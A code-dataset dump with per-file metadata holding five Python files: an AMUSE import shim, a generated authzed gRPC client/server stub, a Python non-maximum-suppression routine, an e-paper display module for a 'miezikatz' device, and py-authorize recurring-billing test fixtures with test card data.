| 0
|
0
| 8
|
d48c646f689aabc0f26c58f0df52338ea8118980
| 151
|
py
|
Python
|
src/amuse/ic/fractalcluster.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/ic/fractalcluster.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/ic/fractalcluster.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
from amuse.community.fractalcluster.interface import MakeFractalCluster
from amuse.community.fractalcluster.interface import new_fractal_cluster_model
| 50.333333
| 78
| 0.907285
| 17
| 151
| 7.882353
| 0.647059
| 0.134328
| 0.268657
| 0.477612
| 0.701493
| 0.701493
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05298
| 151
| 2
| 79
| 75.5
| 0.937063
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d49e0811544e183cb84fdaf2c9685b4f60b2acad
| 6,392
|
py
|
Python
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 13
|
2021-02-17T02:05:51.000Z
|
2022-02-10T01:52:32.000Z
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 6
|
2021-07-17T15:49:10.000Z
|
2022-03-04T13:01:11.000Z
|
authzed/api/v0/namespace_service_pb2_grpc.py
|
samkim/authzed-py
|
a74642e126ca84a4ef93d9c7fc64941cab79a204
|
[
"Apache-2.0"
] | 6
|
2021-03-15T04:35:03.000Z
|
2022-03-04T11:12:10.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from authzed.api.v0 import namespace_service_pb2 as authzed_dot_api_dot_v0_dot_namespace__service__pb2
class NamespaceServiceStub(object):
    """gRPC client stub for the authzed.api.v0.NamespaceService service.

    Exposes one callable attribute per RPC (ReadConfig, WriteConfig,
    DeleteConfigs), each bound to the matching protobuf (de)serializers.
    Generated code — do not edit by hand.
    """
    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        # Each attribute is a UnaryUnaryMultiCallable targeting the RPC of
        # the same name under /authzed.api.v0.NamespaceService.
        self.ReadConfig = channel.unary_unary(
                '/authzed.api.v0.NamespaceService/ReadConfig',
                request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.SerializeToString,
                response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.FromString,
                )
        self.WriteConfig = channel.unary_unary(
                '/authzed.api.v0.NamespaceService/WriteConfig',
                request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.SerializeToString,
                response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.FromString,
                )
        self.DeleteConfigs = channel.unary_unary(
                '/authzed.api.v0.NamespaceService/DeleteConfigs',
                request_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.SerializeToString,
                response_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.FromString,
                )
class NamespaceServiceServicer(object):
    """Server-side interface for authzed.api.v0.NamespaceService.

    Override the methods below in a subclass; every default handler
    reports UNIMPLEMENTED to the caller. Generated code — do not edit.
    """
    def ReadConfig(self, request, context):
        """Default ReadConfig handler: reports UNIMPLEMENTED and raises."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
    def WriteConfig(self, request, context):
        """Default WriteConfig handler: reports UNIMPLEMENTED and raises."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
    def DeleteConfigs(self, request, context):
        """Default DeleteConfigs handler: reports UNIMPLEMENTED and raises."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_NamespaceServiceServicer_to_server(servicer, server):
    """Register *servicer*'s RPC handlers with *server*.

    Binds ReadConfig/WriteConfig/DeleteConfigs to the
    authzed.api.v0.NamespaceService service name. Generated code.
    """
    # Map RPC name -> handler wired to the protobuf (de)serializers.
    rpc_method_handlers = {
            'ReadConfig': grpc.unary_unary_rpc_method_handler(
                    servicer.ReadConfig,
                    request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.FromString,
                    response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.SerializeToString,
            ),
            'WriteConfig': grpc.unary_unary_rpc_method_handler(
                    servicer.WriteConfig,
                    request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.FromString,
                    response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.SerializeToString,
            ),
            'DeleteConfigs': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteConfigs,
                    request_deserializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.FromString,
                    response_serializer=authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'authzed.api.v0.NamespaceService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class NamespaceService(object):
    """Standalone client helpers for authzed.api.v0.NamespaceService.

    Each static method issues a single unary-unary RPC through
    grpc.experimental without a pre-built stub. Part of an EXPERIMENTAL
    gRPC API; generated code — do not edit.
    """
    @staticmethod
    def ReadConfig(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """Invoke the ReadConfig RPC once via grpc.experimental."""
        return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/ReadConfig',
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigRequest.SerializeToString,
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.ReadConfigResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def WriteConfig(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """Invoke the WriteConfig RPC once via grpc.experimental."""
        return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/WriteConfig',
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigRequest.SerializeToString,
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.WriteConfigResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
    @staticmethod
    def DeleteConfigs(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        """Invoke the DeleteConfigs RPC once via grpc.experimental."""
        return grpc.experimental.unary_unary(request, target, '/authzed.api.v0.NamespaceService/DeleteConfigs',
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsRequest.SerializeToString,
            authzed_dot_api_dot_v0_dot_namespace__service__pb2.DeleteConfigsResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 48.06015
| 131
| 0.704787
| 629
| 6,392
| 6.73132
| 0.162162
| 0.075579
| 0.08975
| 0.0718
| 0.817667
| 0.801606
| 0.801606
| 0.742796
| 0.730043
| 0.69367
| 0
| 0.00951
| 0.226846
| 6,392
| 132
| 132
| 48.424242
| 0.847228
| 0.089487
| 0
| 0.470588
| 1
| 0
| 0.081523
| 0.051625
| 0
| 0
| 0
| 0
| 0
| 1
| 0.078431
| false
| 0
| 0.019608
| 0.029412
| 0.156863
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4d099ff0ddee6afddfee249418175ab58e8825b
| 3,331
|
py
|
Python
|
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | 2
|
2018-05-01T13:56:00.000Z
|
2020-01-12T17:59:51.000Z
|
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | null | null | null |
lib/utils/cython_nms.py
|
zzfancitizen/ctpn_win
|
b03451e8e59737d1099f810c12ea68c3f6d4a490
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import numpy as np
# cimport numpy as np
def max(a, b):
    """Return the larger of *a* and *b*; ties favor *a*.

    NOTE: intentionally shadows the builtin ``max`` — leftover from the
    original Cython kernel this module was ported from.
    """
    if a >= b:
        return a
    return b
def min(a, b):
    """Return the smaller of *a* and *b*; ties favor *a*.

    NOTE: intentionally shadows the builtin ``min`` — leftover from the
    original Cython kernel this module was ported from.
    """
    if a <= b:
        return a
    return b
def nms(dets, thresh):
    """Greedy non-maximum suppression (pure-Python port of the Cython kernel).

    Args:
        dets: (N, 5) array; columns are x1, y1, x2, y2, score.
        thresh: IoU threshold; a lower-scoring box overlapping a kept box
            with IoU >= thresh is suppressed.

    Returns:
        List of indices into ``dets`` of the surviving boxes, in
        descending score order.
    """
    x1 = dets[:, 0]
    y1 = dets[:, 1]
    x2 = dets[:, 2]
    y2 = dets[:, 3]
    scores = dets[:, 4]
    # +1 keeps parity with the original integer-pixel area convention.
    areas = (x2 - x1 + 1) * (y2 - y1 + 1)
    # Indices sorted by descending score.
    order = scores.argsort()[::-1]
    ndets = dets.shape[0]
    # BUGFIX: ``np.int`` was removed in NumPy 1.24; use the builtin int.
    suppressed = np.zeros(ndets, dtype=int)
    # (Leftover commented-out Cython ``cdef`` declarations removed.)
    keep = []
    for _i in range(ndets):
        i = order[_i]
        if suppressed[i] == 1:
            continue
        keep.append(i)
        ix1 = x1[i]
        iy1 = y1[i]
        ix2 = x2[i]
        iy2 = y2[i]
        iarea = areas[i]
        for _j in range(_i + 1, ndets):
            j = order[_j]
            if suppressed[j] == 1:
                continue
            # Intersection rectangle of box i and box j.
            xx1 = max(ix1, x1[j])
            yy1 = max(iy1, y1[j])
            xx2 = min(ix2, x2[j])
            yy2 = min(iy2, y2[j])
            w = max(0.0, xx2 - xx1 + 1)
            h = max(0.0, yy2 - yy1 + 1)
            inter = w * h
            # Intersection-over-union.
            ovr = inter / (iarea + areas[j] - inter)
            if ovr >= thresh:
                suppressed[j] = 1
    return keep
def nms_new(dets, thresh):
    """NMS variant that also suppresses near-fully-contained boxes.

    Identical to :func:`nms`, except a lower-scoring box is additionally
    suppressed when the intersection covers more than 95% of either box
    (``ovr1``/``ovr2``), regardless of the IoU threshold.

    Args:
        dets: (N, 5) array; columns are x1, y1, x2, y2, score.
        thresh: IoU threshold for suppression.

    Returns:
        List of indices into ``dets`` of the surviving boxes, in
        descending score order.
    """
    x1 = dets[:, 0]
    y1 = dets[:, 1]
    x2 = dets[:, 2]
    y2 = dets[:, 3]
    scores = dets[:, 4]
    # +1 keeps parity with the original integer-pixel area convention.
    areas = (x2 - x1 + 1) * (y2 - y1 + 1)
    order = scores.argsort()[::-1]
    ndets = dets.shape[0]
    # BUGFIX: ``np.int`` was removed in NumPy 1.24; use the builtin int.
    suppressed = np.zeros(ndets, dtype=int)
    # (Leftover commented-out Cython ``cdef`` declarations removed.)
    keep = []
    for _i in range(ndets):
        i = order[_i]
        if suppressed[i] == 1:
            continue
        keep.append(i)
        ix1 = x1[i]
        iy1 = y1[i]
        ix2 = x2[i]
        iy2 = y2[i]
        iarea = areas[i]
        for _j in range(_i + 1, ndets):
            j = order[_j]
            if suppressed[j] == 1:
                continue
            # Intersection rectangle of box i and box j.
            xx1 = max(ix1, x1[j])
            yy1 = max(iy1, y1[j])
            xx2 = min(ix2, x2[j])
            yy2 = min(iy2, y2[j])
            w = max(0.0, xx2 - xx1 + 1)
            h = max(0.0, yy2 - yy1 + 1)
            inter = w * h
            ovr = inter / (iarea + areas[j] - inter)
            # Fraction of each individual box covered by the intersection.
            ovr1 = inter / iarea
            ovr2 = inter / areas[j]
            if ovr >= thresh or ovr1 > 0.95 or ovr2 > 0.95:
                suppressed[j] = 1
    return keep
| 27.081301
| 74
| 0.47193
| 468
| 3,331
| 3.309829
| 0.205128
| 0.030988
| 0.06714
| 0.072305
| 0.858618
| 0.830213
| 0.830213
| 0.830213
| 0.830213
| 0.830213
| 0
| 0.070275
| 0.367757
| 3,331
| 122
| 75
| 27.303279
| 0.665242
| 0.273491
| 0
| 0.860759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050633
| false
| 0
| 0.012658
| 0.025316
| 0.113924
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be01625a0fd176e87ce4290fb61ca46431e1bc1e
| 6,726
|
py
|
Python
|
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
src/screen.py
|
buu-huu/miezikatz
|
092e90d92b2b99f85bbb15dc798ae09cf6b0e0fa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import sys
import os
import miezifaces as faces
# Resource and bundled-library directories live one level above this file's
# directory (i.e. next to the package root).
resdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'res')
libdir = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'lib')
# Make bundled libraries (e.g. waveshare_epd) importable when shipped in lib/.
if os.path.exists(libdir):
    sys.path.append(libdir)
import logging
from waveshare_epd import epd2in7
import time
from PIL import Image, ImageDraw, ImageFont
import traceback
logging.basicConfig(level=logging.DEBUG)
def draw_startup(gateway_ip):
    """Render the startup screen on the 2.7" e-paper display.

    Shows the title, the cat face, a "ready" prompt and the default
    gateway IP inside a framed box.

    Args:
        gateway_ip: Default gateway IP string shown on the display.
    """
    try:
        epd = epd2in7.EPD()
        # Init
        logging.info('init and Clear')
        epd.init()
        epd.Clear(0xFF)
        # Declaring fonts (consola.ttf shipped in res/).
        # BUGFIX: removed unused font35.
        font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
        font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
        # Drawing on a landscape canvas (panel width/height swapped).
        logging.info('Drawing...')
        himage = Image.new('1', (epd.height, epd.width), 255)
        draw = ImageDraw.Draw(himage)
        # Title
        draw.text((10, 0), 'miezikatz', font=font24, fill=0)
        # Face (three rows of ASCII art)
        draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
        draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
        draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
        # Explanation
        draw.text((10, 150), 'Ready for meowing! Press Button...', font=font12, fill=0)
        # Gateway IP in a framed box
        draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
        draw.text((130, 40), gateway_ip, font=font12, fill=0)
        draw.rectangle((125, 25, 250, 55), outline=0)
        epd.display(epd.getbuffer(himage))
    except IOError as e:
        logging.info(e)
    except KeyboardInterrupt:
        logging.info('ctrl + c:')
        epd2in7.epdconfig.module_exit()
        # BUGFIX: use sys.exit() instead of the site-only builtin exit().
        sys.exit()
def draw_scanning(gateway_ip):
    """Render the "scanning" screen on the 2.7" e-paper display.

    Same layout as the startup screen, but the explanation line shows the
    /24 network currently being scanned. Does nothing when *gateway_ip*
    is empty.

    Args:
        gateway_ip: Default gateway IP string shown on the display.
    """
    if gateway_ip == '':
        return
    try:
        epd = epd2in7.EPD()
        # Init
        logging.info('init and Clear')
        epd.init()
        epd.Clear(0xFF)
        # Declaring fonts (consola.ttf shipped in res/).
        # BUGFIX: removed unused font35.
        font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
        font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
        # Drawing on a landscape canvas (panel width/height swapped).
        logging.info('Drawing...')
        himage = Image.new('1', (epd.height, epd.width), 255)
        draw = ImageDraw.Draw(himage)
        # Title
        draw.text((10, 0), 'miezikatz', font=font24, fill=0)
        # Face (three rows of ASCII art)
        draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
        draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
        draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
        # Explanation
        draw.text((10, 150), 'Meowing at ' + gateway_ip + '/24', font=font12, fill=0)
        # Gateway IP in a framed box
        draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
        draw.text((130, 40), gateway_ip, font=font12, fill=0)
        draw.rectangle((125, 25, 250, 55), outline=0)
        epd.display(epd.getbuffer(himage))
    except IOError as e:
        logging.info(e)
    except KeyboardInterrupt:
        logging.info('ctrl + c:')
        epd2in7.epdconfig.module_exit()
        # BUGFIX: use sys.exit() instead of the site-only builtin exit().
        sys.exit()
def draw_scanned(gateway_ip, linecount):
    """Render the "scan finished" screen on the 2.7" e-paper display.

    Shows the standard layout plus a second framed box with the number of
    lines written to the output file. Does nothing when *gateway_ip* is
    empty.

    Args:
        gateway_ip: Default gateway IP string shown on the display.
        linecount: Number of lines written to the result file.
    """
    if gateway_ip == '':
        return
    try:
        epd = epd2in7.EPD()
        # Init
        logging.info('init and Clear')
        epd.init()
        epd.Clear(0xFF)
        # Declaring fonts (consola.ttf shipped in res/).
        # BUGFIX: removed unused font35.
        font24 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 24)
        font12 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 12)
        # Drawing on a landscape canvas (panel width/height swapped).
        logging.info('Drawing...')
        himage = Image.new('1', (epd.height, epd.width), 255)
        draw = ImageDraw.Draw(himage)
        # Title
        draw.text((10, 0), 'miezikatz', font=font24, fill=0)
        # Face (three rows of ASCII art)
        draw.text((10, 40), faces.STARTUP_MIEZI1, font=font24, fill=0)
        draw.text((10, 65), faces.STARTUP_MIEZI2, font=font24, fill=0)
        draw.text((10, 90), faces.STARTUP_MIEZI3, font=font24, fill=0)
        # Explanation
        draw.text((10, 150), 'Finished! Maybe collected sth :3 ', font=font12, fill=0)
        # Gateway IP in a framed box
        draw.text((130, 30), 'Default Gateway', font=font12, fill=0)
        draw.text((130, 40), gateway_ip, font=font12, fill=0)
        draw.rectangle((125, 25, 250, 55), outline=0)
        # Linecount in a second framed box
        draw.text((130, 65), 'Wrote', font=font12, fill=0)
        draw.text((130, 75), str(linecount), font=font12, fill=0)
        draw.text((130, 85), 'lines to file', font=font12, fill=0)
        draw.rectangle((125, 60, 250, 100), outline=0)
        epd.display(epd.getbuffer(himage))
    except IOError as e:
        logging.info(e)
    except KeyboardInterrupt:
        logging.info('ctrl + c:')
        epd2in7.epdconfig.module_exit()
        # BUGFIX: use sys.exit() instead of the site-only builtin exit().
        sys.exit()
def draw_shutdown():
    """Render the shutdown ("sleeping cat") screen on the e-paper display.

    Draws a title, a short note and the sleeping-cat bitmap from res/.
    """
    try:
        epd = epd2in7.EPD()
        # Init
        logging.info('init and Clear')
        epd.init()
        epd.Clear(0xFF)
        # Declaring fonts (consola.ttf shipped in res/).
        font18 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 18)
        font10 = ImageFont.truetype(os.path.join(resdir, 'consola.ttf'), 10)
        # (Removed a dead bare-string block of commented-out example code.)
        # Drawing on a landscape canvas (panel width/height swapped).
        logging.info('Drawing...')
        himage = Image.new('1', (epd.height, epd.width), 255)
        bmp = Image.open(os.path.join(resdir, 'sleeping_miezi.bmp'))
        draw = ImageDraw.Draw(himage)
        # Title
        draw.text((2, 2), 'Miezi tired. Zzzzz...', font=font18, fill=0)
        # Explanation
        draw.text((2, 18), '[ Don\'t wake her up :( ]', font=font10, fill=0)
        # Bitmap
        himage.paste(bmp, (25, 40))
        epd.display(epd.getbuffer(himage))
    except IOError as e:
        logging.info(e)
    except KeyboardInterrupt:
        logging.info('ctrl + c:')
        epd2in7.epdconfig.module_exit()
        # BUGFIX: use sys.exit() instead of the site-only builtin exit().
        sys.exit()
| 32.492754
| 90
| 0.559917
| 818
| 6,726
| 4.559902
| 0.184597
| 0.055764
| 0.040214
| 0.051475
| 0.819303
| 0.812869
| 0.801072
| 0.769169
| 0.738338
| 0.738338
| 0
| 0.074277
| 0.295421
| 6,726
| 206
| 91
| 32.650485
| 0.712809
| 0.043711
| 0
| 0.758065
| 0
| 0
| 0.07781
| 0
| 0
| 0
| 0.002599
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.064516
| 0
| 0.112903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be20c7c2ab2269d88a1f9a7e088409fd6a482b0a
| 11,207
|
py
|
Python
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 30
|
2015-03-13T01:31:52.000Z
|
2021-06-11T08:49:43.000Z
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 41
|
2015-01-30T20:01:05.000Z
|
2022-03-31T23:11:56.000Z
|
tests/test_recurring_api.py
|
ab25db/py-authorize
|
424eaefbb2e13d0bb401c53ef36eb40fc7762260
|
[
"MIT"
] | 34
|
2015-01-11T20:22:03.000Z
|
2022-03-28T20:34:22.000Z
|
from authorize import Configuration
from authorize.xml_data import prettify
from datetime import date
from unittest import TestCase
CREATE_RECURRING = {
'name': 'Ultimate Robot Supreme Plan',
'amount': 40.00,
'total_occurrences': 30,
'start_date': date.today().isoformat(),
'interval_length': 2,
'interval_unit': 'months',
'trial_amount': 30.00,
'trial_occurrences': 2,
'credit_card': {
'card_number': '4111111111111111',
'expiration_month': '04',
'expiration_year': '2014',
'card_code': '456',
},
'billing': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
'order': {
'invoice_number': 'INV0001',
'description': 'Just another invoice...',
},
'customer': {
'merchant_id': '1234567890',
'email': 'rob@robotronstudios.com',
},
'shipping': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
}
UPDATE_RECURRING = {
'name': 'Ultimate Robot Supreme Plan',
'amount': 40.00,
'total_occurrences': 30,
'start_date': date.today().isoformat(),
'trial_amount': 30.00,
'trial_occurrences': 2,
'credit_card': {
'card_number': '4111111111111111',
'expiration_month': '04',
'expiration_year': '2014',
'card_code': '456',
},
'billing': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
'order': {
'invoice_number': 'INV0001',
'description': 'Just another invoice...',
},
'customer': {
'merchant_id': '1234567890',
'email': 'rob@robotronstudios.com',
},
'shipping': {
'first_name': 'Rob',
'last_name': 'Oteron',
'company': 'Robotron Studios',
'address': '101 Computer Street',
'city': 'Tucson',
'state': 'AZ',
'zip': '85704',
'country': 'US',
},
}
# Variant of UPDATE_RECURRING with the payment information stripped out.
# NOTE(review): .copy() is shallow, so the nested dicts are shared with
# UPDATE_RECURRING — fine here because only the top-level key is deleted.
UPDATE_RECURRING_NO_PAYMENT = UPDATE_RECURRING.copy()
del UPDATE_RECURRING_NO_PAYMENT['credit_card']
# Minimal update payload carrying only new credit-card details.
UPDATE_RECURRING_PAYMENT_ONLY = {
    'credit_card': {
        'card_number': '4111111111111111',
        'expiration_month': '04',
        'expiration_year': '2014',
        'card_code': '456',
    },
}
CREATE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBCreateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<interval>
<length>2</length>
<unit>months</unit>
</interval>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBCreateSubscriptionRequest>
'''.format(date.today().isoformat())
DETAILS_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBGetSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBGetSubscriptionRequest>
'''
STATUS_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBGetSubscriptionStatusRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
</ARBGetSubscriptionStatusRequest>
'''
UPDATE_RECURRING_REQUEST = '''
<?xml version="1.0" ?>
<ARBUpdateSubscriptionRequest xmlns="AnetApi/xml/v1/schema/AnetApiSchema.xsd">
<merchantAuthentication>
<name>8s8tVnG5t</name>
<transactionKey>5GK7mncw8mG2946z</transactionKey>
</merchantAuthentication>
<subscriptionId>0932576929034</subscriptionId>
<subscription>
<name>Ultimate Robot Supreme Plan</name>
<paymentSchedule>
<startDate>{0}</startDate>
<totalOccurrences>30</totalOccurrences>
<trialOccurrences>2</trialOccurrences>
</paymentSchedule>
<amount>40.00</amount>
<trialAmount>30.00</trialAmount>
<payment>
<creditCard>
<cardNumber>4111111111111111</cardNumber>
<expirationDate>2014-04</expirationDate>
<cardCode>456</cardCode>
</creditCard>
</payment>
<order>
<invoiceNumber>INV0001</invoiceNumber>
<description>Just another invoice...</description>
</order>
<customer>
<id>1234567890</id>
<email>rob@robotronstudios.com</email>
</customer>
<billTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</billTo>
<shipTo>
<firstName>Rob</firstName>
<lastName>Oteron</lastName>
<company>Robotron Studios</company>
<address>101 Computer Street</address>
<city>Tucson</city>
<state>AZ</state>
<zip>85704</zip>
<country>US</country>
</shipTo>
</subscription>
</ARBUpdateSubscriptionRequest>
'''.format(date.today().isoformat())
